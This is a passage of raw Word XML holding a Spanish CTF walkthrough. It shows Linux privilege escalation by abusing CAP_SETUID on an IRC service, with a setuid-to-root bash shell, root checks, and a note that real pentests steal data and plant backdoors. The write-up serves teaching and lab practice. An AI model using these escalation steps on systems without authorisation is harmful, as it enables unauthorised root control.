      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C75B1C">
        <w:t>root</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C75B1C">
        <w:t xml:space="preserve">) </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C081C8E" w14:textId="77777777" w:rsidR="00C75B1C" w:rsidRPr="00C75B1C" w:rsidRDefault="00C75B1C" w:rsidP="00C75B1C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="64"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00C75B1C">
        <w:t xml:space="preserve">CAP_SETUID permite este cambio sin ser </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C75B1C">
        <w:t>root</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="2E3C312E" w14:textId="77777777" w:rsidR="00C75B1C" w:rsidRPr="00C75B1C" w:rsidRDefault="00C75B1C" w:rsidP="00C75B1C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="64"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00C75B1C">
        <w:t xml:space="preserve">UID 0 = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C75B1C">
        <w:t>root</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C75B1C">
        <w:t xml:space="preserve"> (el </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C75B1C">
        <w:t>superusuario</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C75B1C">
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56377106" w14:textId="77777777" w:rsidR="00C75B1C" w:rsidRPr="00C75B1C" w:rsidRDefault="00C75B1C" w:rsidP="00C75B1C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="64"/>
        </w:numPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C75B1C">
        <w:t>os.system</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C75B1C">
        <w:t>("/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C75B1C">
        <w:t>bin</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C75B1C">
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C75B1C">
        <w:t>bash</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C75B1C">
        <w:t xml:space="preserve">"): Ejecuta una nueva </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C75B1C">
        <w:t>shell</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C75B1C">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C75B1C">
        <w:t>bash</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C75B1C">
        <w:t xml:space="preserve"> con el nuevo UID</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27F7DFAD" w14:textId="77777777" w:rsidR="00C75B1C" w:rsidRPr="00C75B1C" w:rsidRDefault="00C75B1C" w:rsidP="00C75B1C">
      <w:r w:rsidRPr="00C75B1C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>¿Qué hace este comando?</w:t>
      </w:r>
      <w:r w:rsidRPr="00C75B1C">
        <w:t xml:space="preserve"> Aprovecha la </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C75B1C">
        <w:t>capability</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C75B1C">
        <w:t xml:space="preserve"> CAP_SETUID del servicio para cambiar nuestro UID a </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C75B1C">
        <w:t>root</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C75B1C">
        <w:t xml:space="preserve"> y luego ejecutar una </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C75B1C">
        <w:t>shell</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C75B1C">
        <w:t xml:space="preserve"> con esos privilegios.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B4CCA49" w14:textId="77777777" w:rsidR="00C75B1C" w:rsidRPr="00C75B1C" w:rsidRDefault="00C75B1C" w:rsidP="00C75B1C">
      <w:r w:rsidRPr="00C75B1C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Resultado esperado:</w:t>
      </w:r>
      <w:r w:rsidRPr="00C75B1C">
        <w:t xml:space="preserve"> La </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C75B1C">
        <w:t>shell</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C75B1C">
        <w:t xml:space="preserve"> puede parecer que se "congela" o no muestra </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C75B1C">
        <w:t>prompt</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C75B1C">
        <w:t xml:space="preserve"> inmediatamente, pero ahora eres </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C75B1C">
        <w:t>root</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C75B1C">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="021009BC" w14:textId="77777777" w:rsidR="00C75B1C" w:rsidRPr="00C75B1C" w:rsidRDefault="00C75B1C" w:rsidP="00C75B1C">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C75B1C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Paso 2B: Verificar si la escalada funcionó</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C522599" w14:textId="77777777" w:rsidR="00C75B1C" w:rsidRPr="00C75B1C" w:rsidRDefault="00C75B1C" w:rsidP="00C75B1C">
      <w:r w:rsidRPr="00C75B1C">
        <w:t>Ejecuta:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3679302F" w14:textId="77777777" w:rsidR="00C75B1C" w:rsidRPr="00C75B1C" w:rsidRDefault="00C75B1C" w:rsidP="00C75B1C">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C75B1C">
        <w:t>bash</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="623A3E22" w14:textId="77777777" w:rsidR="00C75B1C" w:rsidRPr="00C75B1C" w:rsidRDefault="00C75B1C" w:rsidP="00C75B1C">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C75B1C">
        <w:t>whoami</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="6F6E8DFE" w14:textId="77777777" w:rsidR="00C75B1C" w:rsidRPr="00C75B1C" w:rsidRDefault="00C75B1C" w:rsidP="00C75B1C">
      <w:r w:rsidRPr="00C75B1C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Resultado esperado:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F4A3BD6" w14:textId="77777777" w:rsidR="00C75B1C" w:rsidRPr="00C75B1C" w:rsidRDefault="00C75B1C" w:rsidP="00C75B1C">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C75B1C">
        <w:t>root</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="5DE6769A" w14:textId="77777777" w:rsidR="00C75B1C" w:rsidRPr="00C75B1C" w:rsidRDefault="00C75B1C" w:rsidP="00C75B1C">
      <w:r w:rsidRPr="00C75B1C">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
        </w:rPr>
        <w:t>🎉</w:t>
      </w:r>
      <w:r w:rsidRPr="00C75B1C">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00C75B1C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">¡Si ves </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C75B1C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>root</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C75B1C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>, la escalada fue exitosa!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D60E781" w14:textId="77777777" w:rsidR="00C75B1C" w:rsidRPr="00C75B1C" w:rsidRDefault="00C75B1C" w:rsidP="00C75B1C">
      <w:r w:rsidRPr="00C75B1C">
        <w:pict w14:anchorId="55719939">
          <v:rect id="_x0000_i1044" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="399E3FD7" w14:textId="77777777" w:rsidR="00C75B1C" w:rsidRPr="00C75B1C" w:rsidRDefault="00C75B1C" w:rsidP="00C75B1C">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C75B1C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Paso 3: Confirmar privilegios completos</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0703FE3D" w14:textId="77777777" w:rsidR="00C75B1C" w:rsidRPr="00C75B1C" w:rsidRDefault="00C75B1C" w:rsidP="00C75B1C">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C75B1C">
        <w:t>bash</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="3F3D298D" w14:textId="77777777" w:rsidR="00C75B1C" w:rsidRPr="00C75B1C" w:rsidRDefault="00C75B1C" w:rsidP="00C75B1C">
      <w:r w:rsidRPr="00C75B1C">
        <w:t>id</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="286FD353" w14:textId="77777777" w:rsidR="00C75B1C" w:rsidRPr="00C75B1C" w:rsidRDefault="00C75B1C" w:rsidP="00C75B1C">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C75B1C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Resultado</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C75B1C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C75B1C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>esperado</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C75B1C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="650AED78" w14:textId="77777777" w:rsidR="00C75B1C" w:rsidRPr="00C75B1C" w:rsidRDefault="00C75B1C" w:rsidP="00C75B1C">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C75B1C">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>uid</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C75B1C">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>=0(root) gid=1001(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C75B1C">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ircd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C75B1C">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>) groups=1001(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C75B1C">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ircd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C75B1C">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F44F805" w14:textId="77777777" w:rsidR="00C75B1C" w:rsidRPr="00C75B1C" w:rsidRDefault="00C75B1C" w:rsidP="00C75B1C">
      <w:r w:rsidRPr="00C75B1C">
        <w:t xml:space="preserve">Nota: Aunque el GID sigue siendo </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C75B1C">
        <w:t>ircd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C75B1C">
        <w:t>, el UID=0 (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C75B1C">
        <w:t>root</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C75B1C">
        <w:t xml:space="preserve">) es lo importante. Tienes todos los privilegios de </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C75B1C">
        <w:t>root</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C75B1C">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F6B57D0" w14:textId="2E14846F" w:rsidR="00C75B1C" w:rsidRPr="00C75B1C" w:rsidRDefault="00C75B1C" w:rsidP="00C75B1C">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C75B1C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>¿Cómo funcionó la escalada?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E3174C1" w14:textId="3577CCE8" w:rsidR="00C75B1C" w:rsidRDefault="00C75B1C" w:rsidP="00B8326D">
      <w:r w:rsidRPr="00C75B1C">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4FFC9DB9" wp14:editId="14309D93">
            <wp:extent cx="3530024" cy="2531778"/>
            <wp:effectExtent l="0" t="0" r="0" b="1905"/>
            <wp:docPr id="564075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75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420" cy="25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4DD6" w14:textId="735E1E46" w:rsidR="00C75B1C" w:rsidRDefault="00C75B1C" w:rsidP="00B8326D">
      <w:r w:rsidRPr="00C75B1C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>CAP_SETUID</w:t>
      </w:r>
      <w:r w:rsidRPr="00C75B1C">
        <w:t xml:space="preserve"> es una "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C75B1C">
        <w:t>capability</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C75B1C">
        <w:t xml:space="preserve">" de Linux que permite a un proceso cambiar su </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C75B1C">
        <w:t>User</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C75B1C">
        <w:t xml:space="preserve"> ID sin necesitar ser </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C75B1C">
        <w:t>root</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C75B1C">
        <w:t xml:space="preserve">. El administrador configuró el servicio con esta </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C75B1C">
        <w:t>capability</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C75B1C">
        <w:t xml:space="preserve"> para que el servidor pudiera abrir puertos privilegiados, pero sin darse cuenta, esto también permite escalada de privilegios.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E86254F" w14:textId="77777777" w:rsidR="00C75B1C" w:rsidRDefault="00C75B1C" w:rsidP="00B8326D"/>
    <w:p w14:paraId="46935CC3" w14:textId="77777777" w:rsidR="00C75B1C" w:rsidRPr="00C75B1C" w:rsidRDefault="00C75B1C" w:rsidP="00C75B1C">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C75B1C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Conceptos aprendidos:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E5A8E6B" w14:textId="77777777" w:rsidR="00C75B1C" w:rsidRPr="00C75B1C" w:rsidRDefault="00C75B1C" w:rsidP="00C75B1C">
      <w:r w:rsidRPr="00C75B1C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>¿Qué es CAP_SETUID?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13164FBA" w14:textId="77777777" w:rsidR="00C75B1C" w:rsidRPr="00C75B1C" w:rsidRDefault="00C75B1C" w:rsidP="00C75B1C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="65"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00C75B1C">
        <w:t>Es una "capacidad" (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C75B1C">
        <w:t>capability</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C75B1C">
        <w:t>) de Linux</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59FD5687" w14:textId="77777777" w:rsidR="00C75B1C" w:rsidRPr="00C75B1C" w:rsidRDefault="00C75B1C" w:rsidP="00C75B1C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="65"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00C75B1C">
        <w:t>Permite cambiar el UID de un proceso</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66ED6F94" w14:textId="77777777" w:rsidR="00C75B1C" w:rsidRPr="00C75B1C" w:rsidRDefault="00C75B1C" w:rsidP="00C75B1C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="65"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00C75B1C">
        <w:t xml:space="preserve">Normalmente solo </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C75B1C">
        <w:t>root</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C75B1C">
        <w:t xml:space="preserve"> puede hacer esto</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DDE683E" w14:textId="77777777" w:rsidR="00C75B1C" w:rsidRPr="00C75B1C" w:rsidRDefault="00C75B1C" w:rsidP="00C75B1C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="65"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00C75B1C">
        <w:t>Pero con CAP_SETUID, cualquier proceso puede hacerlo</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1851E672" w14:textId="77777777" w:rsidR="00C75B1C" w:rsidRPr="00C75B1C" w:rsidRDefault="00C75B1C" w:rsidP="00C75B1C">
      <w:r w:rsidRPr="00C75B1C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>¿Por qué es peligroso?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="190267AD" w14:textId="77777777" w:rsidR="00C75B1C" w:rsidRPr="00C75B1C" w:rsidRDefault="00C75B1C" w:rsidP="00C75B1C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="66"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00C75B1C">
        <w:t>Si un servicio vulnerable tiene CAP_SETUID</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C501D89" w14:textId="77777777" w:rsidR="00C75B1C" w:rsidRPr="00C75B1C" w:rsidRDefault="00C75B1C" w:rsidP="00C75B1C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="66"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00C75B1C">
        <w:t>Un atacante puede explotarlo</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7889C165" w14:textId="77777777" w:rsidR="00C75B1C" w:rsidRPr="00C75B1C" w:rsidRDefault="00C75B1C" w:rsidP="00C75B1C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="66"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00C75B1C">
        <w:t xml:space="preserve">Y luego usar CAP_SETUID para convertirse en </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C75B1C">
        <w:t>root</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="57CD3B79" w14:textId="77777777" w:rsidR="00C75B1C" w:rsidRPr="00C75B1C" w:rsidRDefault="00C75B1C" w:rsidP="00C75B1C">
      <w:r w:rsidRPr="00C75B1C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>¿Por qué el servicio tenía CAP_SETUID?</w:t>
      </w:r>
      <w:r w:rsidRPr="00C75B1C">
        <w:t xml:space="preserve"> En este CTF, el administrador configuró:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="776F6D7E" w14:textId="77777777" w:rsidR="00C75B1C" w:rsidRPr="00C75B1C" w:rsidRDefault="00C75B1C" w:rsidP="00C75B1C">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C75B1C">
        <w:t>AmbientCapabilities</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C75B1C">
        <w:t>=CAP_SETUID CAP_SETGID</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08C86121" w14:textId="77777777" w:rsidR="00C75B1C" w:rsidRPr="00C75B1C" w:rsidRDefault="00C75B1C" w:rsidP="00C75B1C">
      <w:r w:rsidRPr="00C75B1C">
        <w:t>Probablemente para alguna funcionalidad legítima, pero sin darse cuenta de las implicaciones de seguridad.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36C556DF" w14:textId="77777777" w:rsidR="00ED2427" w:rsidRPr="00A86A33" w:rsidRDefault="00433E8C" w:rsidP="00ED2427">
      <w:r w:rsidRPr="00A86A33">
        <w:pict w14:anchorId="48E21FDF">
          <v:rect id="_x0000_i1035" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BA27C08" w14:textId="77777777" w:rsidR="00ED2427" w:rsidRPr="00A86A33" w:rsidRDefault="00ED2427" w:rsidP="00ED2427">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A86A33">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>FASE 6: POST-EXPLOTACIÓN Y CAPTURA DE LA BANDERA</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="337D22A3" w14:textId="77777777" w:rsidR="00ED2427" w:rsidRPr="00A86A33" w:rsidRDefault="00ED2427" w:rsidP="00ED2427">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A86A33">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>¿Qué es esta fase?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62A697FC" w14:textId="77777777" w:rsidR="00ED2427" w:rsidRPr="00A86A33" w:rsidRDefault="00ED2427" w:rsidP="00ED2427">
      <w:r w:rsidRPr="00A86A33">
        <w:t>Una vez dentro del sistema con privilegios máximos, realizamos las acciones que necesitemos:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C219768" w14:textId="77777777" w:rsidR="00ED2427" w:rsidRPr="00A86A33" w:rsidRDefault="00ED2427" w:rsidP="00ED2427">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="55"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00A86A33">
        <w:t>En un pentest real: Robar datos, instalar puertas traseras permanentes, movernos lateralmente a otros sistemas</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FBA4A19" w14:textId="77777777" w:rsidR="00ED2427" w:rsidRPr="00A86A33" w:rsidRDefault="00ED2427" w:rsidP="00ED2427">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="55"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00A86A33">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>En nuestro CTF: Capturar la bandera</w:t>
      </w:r>
      <w:r w:rsidRPr="00A86A33">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00A86A33">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
        </w:rPr>
        <w:t>🏁</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48B96857" w14:textId="77777777" w:rsidR="00ED2427" w:rsidRPr="00A86A33" w:rsidRDefault="00ED2427" w:rsidP="00ED2427">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A86A33">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Paso 1: Verificar tu ubicación actual en el sistema</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BE4A17C" w14:textId="77777777" w:rsidR="00ED2427" w:rsidRPr="00A86A33" w:rsidRDefault="00ED2427" w:rsidP="00ED2427">
      <w:r w:rsidRPr="00A86A33">
        <w:t>pwd</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D13B749" w14:textId="77777777" w:rsidR="00ED2427" w:rsidRPr="00A86A33" w:rsidRDefault="00ED2427" w:rsidP="00ED2427">
      <w:r w:rsidRPr="00A86A33">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Explicación del comando:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="586B4FEC" w14:textId="77777777" w:rsidR="00ED2427" w:rsidRPr="00A86A33" w:rsidRDefault="00ED2427" w:rsidP="00ED2427">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="56"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00A86A33">
        <w:t>pwd: Print Working Directory</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27E5F9DC" w14:textId="77777777" w:rsidR="00ED2427" w:rsidRPr="00A86A33" w:rsidRDefault="00ED2427" w:rsidP="00ED2427">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="56"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00A86A33">
        <w:t>Muestra el directorio actual donde estás trabajando</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CAF40B1" w14:textId="77777777" w:rsidR="00ED2427" w:rsidRPr="00A86A33" w:rsidRDefault="00ED2427" w:rsidP="00ED2427">
      <w:r w:rsidRPr="00A86A33">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>¿Qué hace este comando?</w:t>
      </w:r>
      <w:r w:rsidRPr="00A86A33">
